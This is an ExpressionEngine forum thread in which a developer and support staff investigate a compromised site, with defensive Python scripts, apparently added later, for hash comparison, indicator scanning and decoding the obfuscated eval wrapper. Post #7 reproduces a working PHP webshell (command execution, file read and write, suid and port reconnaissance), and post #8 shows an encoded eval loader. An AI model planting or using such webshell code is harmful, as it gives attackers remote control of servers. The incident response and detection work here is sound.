ExpressionEngine CMS

Might have been Hacked - thoughts?

June 29, 2011 5:44pm

  • #1 / Jun 29, 2011 5:44pm

    Jon Horton

    38 posts

    Hey guys,

    A client recently contacted us saying that there are now links at the bottom of every page on their EE site.

    It looks like some code is appending a link after the closing html tag like this:

    </body> 
    </html><a href="http://minibikegames.com">bike games</a>

    - All template files are clean, the link is not inside of any template
    - I’ve searched the database and can’t find the link anywhere there
    - I’ve done a search using grep for minibikegames, bike, games, etc. with no results
    - I’ve checked the .htaccess file, but nothing has been added.

    Upon further inspection, I found some old template files that looked like they had been infected with a virus perhaps.  They were labeled like this - index.php.infected.  Inside was some encrypted php:

    <?php $o = '7Vptc9s2Ev4c/QqE44nIVKb5Jl….

    I’m wondering if some php code could have been executed and possibly added something to a php config file, or another server file that is still there appending a link to all of my pages.

    If I visit an .html file, the link does not appear, neither does the link appear in the source of the EE control panel.  It only appears inside of EE generated pages, which leads me to believe that something has modified a core EE file. 


    Does anyone have any ideas or input that would help me further investigate this issue?

    Thanks!
    Jon

  • #2 / Jun 29, 2011 5:52pm

    Lisa Wess

    20502 posts

    Hi, Jon,

    Thanks for reporting this. We take security very seriously and will do our best to work with you on figuring out what’s going on. To that, we need some additional information from you…

    1. EE version and build (found at the bottom of your control panel)
    2. Other scripts on your account, whether in use or not (phpBB, etc…)*

    * If this is a shared hosting environment, the host can make a determination if the attack came through scripts on another account on the server, which is commonly the case with these types of hacks.

    While we work through this, please check through these files:

    * path.php
    * config.php
    * index.php

    to ensure that there is no unusual code such as iFrames or JavaScript includes; if you do find that code, then please back-up the file and remove said code.  If you are unsure of what does or doesn’t belong in these files, do not hesitate to ask.

    You may also wish to refresh your files by following the build update instructions.

    Also please ensure that you report this to your host immediately as they can help identify where the attack originated from so that steps can be taken to prevent this in the future.

  • #3 / Jun 29, 2011 6:40pm

    Jon Horton

    38 posts

    Hi Lisa,
    Thanks for the quick reply.

    The site is running EE 1.6.4 Build:  20080710 (old, i know)
    EE is currently the only system installed, and the only database that exists.

    It’s hosted on Rackspace as a cloud site.

    I’ve checked all three of those files and nothing seems to be out of place, but I’ll post here just to make sure:

    path.php

    <?php
    
    // ------------------------------------------------------
    // DO NOT ALTER THIS FILE UNLESS YOU HAVE A REASON TO
    
    // ------------------------------------------------------
    // Path to the directory containing your backend files
    
    $system_path = "./admin/";
    
    // ------------------------------------------------------
    // MANUALLY CONFIGURABLE VARIABLES
    // See user guide for more information
    // ------------------------------------------------------
    
    $template_group = "";
    $template = "";
    $site_url = "";
    $site_index = "";
    $site_404 = "";
    $global_vars = array(); // This array must be associative
    
    ?>


    config.php

    <?php
    
    if ( ! defined('EXT')){
    exit('Invalid file request');
    }
    
    $conf['app_version'] = "164";
    $conf['license_number'] = "xxxxxx";
    $conf['debug'] = "1";
    $conf['install_lock'] = "1";
    $conf['db_hostname'] = "xxxxxx";
    $conf['db_username'] = "xxxxxx";
    $conf['db_password'] = "xxxxxx";
    $conf['db_name'] = "xxxxxx";
    $conf['db_type'] = "mysql";
    $conf['db_prefix'] = "exp";
    $conf['db_conntype'] = "0";
    $conf['system_folder'] = "admin";
    $conf['cp_url'] = "http://www.sitename.com/admin/";
    $conf['doc_url'] = "http://expressionengine.com/docs/";
    $conf['cookie_prefix'] = "";
    $conf['is_system_on'] = "y";
    $conf['allow_extensions'] = "y";
    $conf['multiple_sites_enabled'] = "n";
    $conf['user_module_key_expiration'] = "30";
    $conf['user_email_is_username'] = "y";
    $conf['user_screen_name_override'] = "first-name|last-name";
    $conf['user_category_group'] = "2";
    ?>


    I’m currently in the process of getting permission to update to the latest version of EE, and will let you know as soon as I’m able to.  I’ll also notify the host and see if we can find anything out from that end.

    It’s also worth noting that Rackspace cloud sites don’t have SSH access, so I’m unable to make any changes through that route.

  • #4 / Jun 29, 2011 6:42pm

    Lisa Wess

    20502 posts

    Are you saving templates as files?

    I’d also make sure you do a whole file replacement; I’d bet that that line is in some file somewhere, and replacing those files gives you a clean slate.

    But it’s most important that we find the point of entry.  Let us know what the host says, they’re most able to assess that.

    Thanks, Jon!
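The "whole file replacement" advice above rests on a simple idea: compare every deployed file against a known-clean copy of the same build and review whatever differs. The script below is an added example (not code from the thread, EllisLab or ExpressionEngine) that does exactly that with SHA-256 manifests. The directory layout and file names it builds (`admin/core/core.output.php`, `images/htaccess.php`) are constructed for the demo and only stand in for a real install; in practice you would point `compare_trees()` at an unpacked clean download and at the site's document root.

```python
# Added example, not from the thread: compare a deployed tree against a clean
# reference copy of the same build, hash by hash, to surface tampered files.
import hashlib
import os
import tempfile
from pathlib import Path


def hash_tree(root):
    """Return {relative_posix_path: sha256_hex} for every regular file under root."""
    root = Path(root)
    manifest = {}
    for path in sorted(root.rglob("*")):
        if path.is_file():
            digest = hashlib.sha256(path.read_bytes()).hexdigest()
            manifest[path.relative_to(root).as_posix()] = digest
    return manifest


def compare_trees(clean_root, deployed_root, review=("path.php", "config.php")):
    """Classify deployed files as modified, added, missing or needing manual review.

    Files named in `review` carry site-specific settings (paths, credentials) and
    are expected to differ from the clean copy, so they are listed separately
    instead of being reported as tampered; a person still reads them line by line.
    """
    clean = hash_tree(clean_root)
    deployed = hash_tree(deployed_root)
    report = {"modified": [], "added": [], "missing": [], "review_manually": []}
    for rel, digest in deployed.items():
        if os.path.basename(rel) in review:
            report["review_manually"].append(rel)
        elif rel not in clean:
            report["added"].append(rel)      # e.g. a PHP file dropped into images/
        elif clean[rel] != digest:
            report["modified"].append(rel)   # e.g. an echo injected into a core file
    report["missing"] = [rel for rel in clean if rel not in deployed]
    return {key: sorted(val) for key, val in report.items()}


def build_demo_trees(base):
    """Construct a tiny, illustrative layout: a clean copy and a tampered deployed copy.

    The file names are assumptions for this demo, not the real EE 1.x file list.
    """
    base = Path(base)
    clean, deployed = base / "clean", base / "deployed"
    for root in (clean, deployed):
        (root / "admin" / "core").mkdir(parents=True)
        (root / "images").mkdir()
        (root / "index.php").write_text("<?php require 'path.php';\n")
        (root / "path.php").write_text("<?php $system_path = './admin/';\n")
        (root / "admin" / "core" / "core.output.php").write_text("<?php // renders output\n")
    # Tampering exists in the deployed copy only (constructed to mirror the symptoms
    # in the thread: a link appended by a core file, a stray PHP file under images/).
    (deployed / "admin" / "core" / "core.output.php").write_text(
        "<?php // renders output\necho '<a href=\"http://example.invalid/\">x</a>';\n")
    (deployed / "images" / "htaccess.php").write_text("<?php // stray file\n")
    (deployed / "path.php").write_text(
        "<?php $system_path = './admin/'; $site_url = 'http://www.example.invalid/';\n")
    return clean, deployed


def demo():
    """Build the two trees in a temp dir and return the comparison report."""
    with tempfile.TemporaryDirectory() as tmp:
        clean, deployed = build_demo_trees(tmp)
        return compare_trees(clean, deployed)


if __name__ == "__main__":
    for category, files in demo().items():
        print(f"{category}: {files}")
```

Anything in `added` or `modified` is what the thread was hunting for by hand; `review_manually` is the short list Lisa says to inspect by eye after the wholesale replacement.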

  • #5 / Jun 29, 2011 10:08pm

    Jon Horton

    38 posts

    Templates are not being saved as files, but they may have been at some point since all of the template files were in the system/templates directory. This is also where all of the template_name.php.infected files were located.

    I’ll be in touch soon when I find out more.

  • #6 / Jun 30, 2011 10:01am

    Jon Horton

    38 posts

    Just heard back from Rackspace and they did a search for the offending link but couldn’t find anything referring to that or any other malicious files on the server side.  They also checked file permissions, but said everything looked good on that end too. 

    Seems like an outdated EE install may have been the culprit, but I still can’t find where this link is being generated from!

  • #7 / Jun 30, 2011 10:34am

    Jon Horton

    38 posts

    I don’t know if this is related, but in my searching I found an odd htaccess.php file in the images directory.

    Tried attaching the file as a txt file, but can’t.  Posting the first bit of code below:

    <?php
    if(isset($_GET['lilo'])) {
    clearstatcache();
    set_magic_quotes_runtime(0);
    if(!function_exists('ini_set')){
    function ini_set(){
    return FALSE;
    }
    }
    ini_set('output_buffering',0);
    if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited';
    else $limit = get_cfg_var('max_execution_time');
    
    if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){
    $_POST = &$HTTP_POST_VARS;
    $_GET = &$HTTP_GET_VARS;
    $_SERVER = &$HTTP_SERVER_VARS;
    }
    
    if(@get_magic_quotes_gpc()){
    foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);
    foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v);
    }
    
    function execute($c){
    if(function_exists('exec')){
    @exec($c, $out);
    return @implode("\n", $out);
    }elseif(function_exists('shell_exec')){
    $out = @shell_exec($c);
    return $out;
    }elseif(function_exists('system')){
    @ob_start();
    @system($c, $ret);
    $out = @ob_get_contents();
    @ob_end_clean();
    return $out;
    }elseif(function_exists('passthru')){
    @ob_start();
    @passthru($c, $ret);
    $out = @ob_get_contents();
    @ob_end_clean();
    return $out;
    }else{
    return FALSE;
    }
    }
    
    function read($f){
    $str = @file($f);
    if($str){
    $out = implode('', $str);
    }elseif(function_exists('curl_version')){
    @ob_start();
    $h = @curl_init('file:/'.'/'.$f);
    @curl_exec($h);
    $out = @ob_get_contents();
    @ob_end_clean();
    }else{
    $out = 'Could not read file!';
    }
    return htmlspecialchars($out);
    }
    
    function write($f, $c){
    $t = filemtime($f);
    $fp = @fopen($f, 'w');
    if($fp){
    fwrite($fp, $c);
    fclose($fp);
    $out = 'File saved.'."\n";
    if($t && touch($f, $t)){
    $out .= 'Last modification time changed.';
    }else{
    $out .= 'Could not change last modification time!';
    }
    }else{
    $out = 'Saving failed!';
    }
    return $out;
    }
    
    function file_size($f){
    $size = filesize($f);
    if($size < 1024) $size = $size.' b';
    elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb';
    elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb';
    return $size;
    }
    
    if(!function_exists('natcasesort')){
    function natcasesort($arr){
    return sort($arr);
    }
    }
    
    if(!empty($_POST['dir'])){
    $dir = $_POST['dir'];
    if(!@chdir($dir)) $out = 'chdir() failled!';
    }
    $dir = getcwd();
    
    
    
    (strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix';
    
    if(!$os_name = @php_uname()){
    if(function_exists('posix_uname')){
    $os_name = posix_uname();
    }elseif($os_name != getenv('OS')){
    $os_name = '';
    }
    }
    
    if(function_exists('posix_getpwuid')){
    $data = posix_getpwuid(posix_getuid());
    $user = $data['name'].' uid('.$data['uid'].') gid('.$data['gid'].')';
    }else{
    $user = '';
    }
    
    $safe_mode = get_cfg_var('safe_mode');
    $safe_mode ? $safe = 'on' : $safe = 'off';
    
    execute('echo ssps') ? $execute = 'on' : $execute = 'off';
    
    
    
    
    $server = getenv('SERVER_SOFTWARE');
    if(!$server) $server = '---';
    
    
    
    $out = '';
    $tail = '';
    $aliases = '';
    if(!$safe_mode){
    if($os_type == 'nix'){
    $os .= execute('sysctl -n kern.ostype');
    $os .= execute('sysctl -n kern.osrelease');
    $os .= execute('sysctl -n kernel.ostype');
    $os .= execute('sysctl -n kernel.osrelease');
    if(empty($user)) $user = execute('id');
    $aliases = array(
    '' => '',
    'find suid files'=>'find / -type f -perm -04000 -ls',
    'find sgid files'=>'find / -type f -perm -02000 -ls',
    'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
    'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
    'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
    'show opened ports'=>'netstat -an | grep -i listen',
    );
    }else{
    $os_name .= execute('ver');
    $user .= execute('echo %username%');
    $aliases = array(
    '' => '',
    'show runing services' => 'net start',
    'show process list' => 'tasklist'
    );
    }
    }
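
The file posted above has the classic traits of a PHP webshell: it only activates on a magic query parameter, defines an `execute()` helper that tries `exec`, `shell_exec`, `system` and `passthru` in turn, and lets a POST parameter drive `chdir()`. The script below is an added example (not code from the thread or from ExpressionEngine) of a simple indicator scan that flags those traits, plus the other things discussed in the thread: hex-escaped strings handed to `eval()`, leftover `.infected` files, PHP files living under media directories, and external iframe/script includes. The sample files it writes into a temporary directory are constructed for the demo; the webshell-like fragment there is a non-functional stub with the telltale shapes, not a working shell.

```python
# Added example, not from the thread: static indicator scan for the traits seen
# in the posted files. Patterns are heuristics; tune them for your code base.
import re
import tempfile
from pathlib import Path

INDICATORS = {
    "eval_of_decoded_payload": re.compile(
        r"eval\s*\(\s*(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(", re.I),
    # eval("\x65\x76...") hides the decoder name, so catch long \xNN runs directly
    "long_hex_escaped_string": re.compile(r'"(?:\\x[0-9a-fA-F]{2}){8,}"'),
    "shell_execution_function": re.compile(
        r"\b(?:exec|shell_exec|system|passthru|popen|proc_open)\s*\(", re.I),
    "request_superglobal": re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\["),
    "chdir_from_variable": re.compile(r"chdir\s*\(\s*\$"),
    "external_iframe_or_script": re.compile(
        r"<(?:iframe|script)\b[^>]*\bsrc\s*=\s*[\"']https?://", re.I),
}
MEDIA_DIRS = {"images", "uploads", "files"}  # assumption: where PHP should never live


def scan_text(text):
    """Return the sorted names of every indicator pattern that matches the text."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(text))


def classify(rel_path, hits):
    """Combine pattern hits with path-based signals into a list of reasons."""
    reasons = list(hits)
    path = Path(rel_path)
    if rel_path.endswith(".infected"):
        reasons.append("leftover_infected_file")
    if path.suffix == ".php" and any(p.lower() in MEDIA_DIRS for p in path.parts[:-1]):
        reasons.append("php_file_in_media_directory")
    if "request_superglobal" in hits and "shell_execution_function" in hits:
        reasons.append("LIKELY_WEBSHELL")  # request input reaching a shell primitive
    return sorted(reasons)


def scan_tree(root):
    """Walk root and return {relative_path: [reasons]} for every flagged file."""
    root = Path(root)
    findings = {}
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        rel = p.relative_to(root).as_posix()
        reasons = classify(rel, scan_text(p.read_text(errors="replace")))
        if reasons:
            findings[rel] = reasons
    return findings


# Constructed sample files (stubs with the shapes from the thread, not working code).
INFECTED_TEMPLATE = (
    "<?php $o = 'AAAA';\n"
    r'eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73'
    r'\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B");' "\n"
)
WEBSHELL_STUB = (
    "<?php\nif(isset($_GET['lilo'])) {\n"
    "  function execute($c){ if(function_exists('exec')){ @exec($c, $out); return @implode(\"\\n\", $out); } }\n"
    "  if(!empty($_POST['dir'])){ @chdir($_POST['dir']); }\n}\n"
)
INJECTED_INDEX = "<?php require 'path.php';\n<script src=\"http://example.invalid/a.js\"></script>\n"
CLEAN_TEMPLATE = "<html><body><a href=\"/about\">About</a></body></html>\n"
CLEAN_CONFIG = "<?php $conf['db_type'] = \"mysql\";\n"


def demo():
    """Write the constructed samples to a temp dir and return the scan findings."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for sub in ("templates", "images", "admin"):
            (root / sub).mkdir()
        (root / "templates" / "index.php.infected").write_text(INFECTED_TEMPLATE)
        (root / "images" / "htaccess.php").write_text(WEBSHELL_STUB)
        (root / "index.php").write_text(INJECTED_INDEX)
        (root / "templates" / "home.html").write_text(CLEAN_TEMPLATE)
        (root / "admin" / "config.php").write_text(CLEAN_CONFIG)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, reasons in demo().items():
        print(rel, "->", ", ".join(reasons))
```

The scan is a triage aid, not proof: a hit tells you which files to read first, and a clean result does not mean the tree is clean, which is why the hash comparison against a known-good copy still matters.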
  • #8 / Jun 30, 2011 10:42am

    Jon Horton

    38 posts

    Apologies for the info overload, but figured this might be worth it too.

    Below is the last segment of the infected php files:

    eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B");

    Not sure how to decode it, but I’m wondering if this still exists elsewhere on the site.
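
The hex escapes in that `eval()` call are just PHP string escapes for ordinary characters, so the safe way to read them is to translate the escapes as text rather than run the file. The script below is an added example (not from the thread or from ExpressionEngine) that decodes the posted literal, recognises the `eval(gzinflate(base64_decode($o)))` wrapper, and then statically performs the base64 + raw-DEFLATE steps on the `$o` value without executing anything. It goes one step beyond the post by also peeling nested layers where the recovered payload is itself another such wrapper. Because the thread only shows the first characters of `$o`, the payload used here is constructed inside the script.

```python
# Added example, not from the thread: decode the hex-escaped eval() wrapper and
# statically unwrap gzinflate(base64_decode(...)) layers without running them.
import base64
import re
import zlib

# The literal exactly as posted in the thread (raw string keeps the backslashes).
EVAL_ARG_FROM_THREAD = (
    r"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73"
    r"\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"
)

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
WRAPPER = re.compile(
    r"^\s*eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*\$(\w+)\s*\)\s*\)\s*\)\s*;?\s*$")
NESTED = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)\s*\)\s*\)")


def decode_php_hex_string(literal):
    """Translate a PHP double-quoted string made of \\xNN escapes into plain text."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def unwrap_gzinflate_base64(payload_b64):
    """Do what base64_decode() + gzinflate() would do, as data, never as code.

    PHP's gzinflate() is raw DEFLATE, which zlib exposes via wbits = -15.
    """
    raw = base64.b64decode(payload_b64)
    return zlib.decompress(raw, -15).decode("utf-8", errors="replace")


def analyse(eval_arg_literal, variables):
    """Decode the eval() argument and, if it is the known wrapper, recover the payload.

    `variables` maps PHP variable names (without '$') to their string values as
    read from the file, e.g. {"o": "7Vptc9s2..."}.
    """
    wrapper = decode_php_hex_string(eval_arg_literal)
    m = WRAPPER.match(wrapper)
    if not m:
        return {"wrapper": wrapper, "payload": None}
    var = m.group(1)
    if var not in variables:
        return {"wrapper": wrapper, "payload": None, "missing_variable": var}
    return {"wrapper": wrapper, "variable": var,
            "payload": unwrap_gzinflate_base64(variables[var])}


def peel_layers(payload, max_layers=10):
    """Keep unwrapping while the recovered text is itself another wrapper."""
    layers = [payload]
    for _ in range(max_layers):
        m = NESTED.search(layers[-1])
        if not m:
            break
        layers.append(unwrap_gzinflate_base64(m.group(1)))
    return layers


def make_sample_payload(text):
    """Constructed helper: produce base64(raw-deflate(text)), the form $o takes."""
    c = zlib.compressobj(level=9, wbits=-15)
    return base64.b64encode(c.compress(text.encode()) + c.flush()).decode("ascii")


def demo():
    """Build a two-layer constructed payload for $o and decode it statically."""
    final_text = "<?php echo 'injected';"  # constructed stand-in for the real payload
    inner = make_sample_payload(final_text)
    outer = make_sample_payload("eval(gzinflate(base64_decode('" + inner + "')));")
    result = analyse(EVAL_ARG_FROM_THREAD, {"o": outer})
    layers = peel_layers(result["payload"])
    return {"wrapper": result["wrapper"], "layers": len(layers), "final": layers[-1]}


if __name__ == "__main__":
    out = demo()
    print("eval() argument decodes to:", out["wrapper"])
    print("layers unwrapped:", out["layers"])
    print("final payload:", out["final"])
```

Run against a real `.infected` file you would copy the full `$o` string into `variables`; the decoded text is what the site actually executed, and is usually where the appended link (or a loader for it) shows up.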

  • #9 / Jun 30, 2011 2:49pm

    Lisa Wess

    20502 posts

    Yes, it’s fairly common, these days, for hackers to encode the links; that’s why I am encouraging you to do a wholesale file replacement (and manually look at the few files you need to keep, such as path.php and config.php).

    Rackspace should be able to find the point of entry, though.  Any updates on that part of the investigation?

    Thanks Jon!

  • #10 / Jul 11, 2011 12:40pm

    Jon Horton

    38 posts

    The host maintains that there’s nothing wrong on their end, and that nothing suspicious turned up when they checked out the account; they also said this issue is not supported anymore :(

    Unfortunately, the client doesn’t want us to investigate this issue further as they’re about to release a new site (not created by us), so I won’t be able to provide much more troubleshooting :(

    If there’s anything else I can easily do that will help you out, just let me know.

    Thanks again for your help,
    Jon

  • #11 / Jul 12, 2011 5:37pm

    Brandon Jones

    5500 posts

    Hi Jon,

    The best advice I can give is to do a version update to EE 1.7.1, since as you know 1.6.4 is pretty ancient and there have certainly been security updates since then.

    It sounds like troubleshooting further with the client is futile, but don’t hesitate to start a new thread if anything else crops up. Thanks for bringing this to our attention!
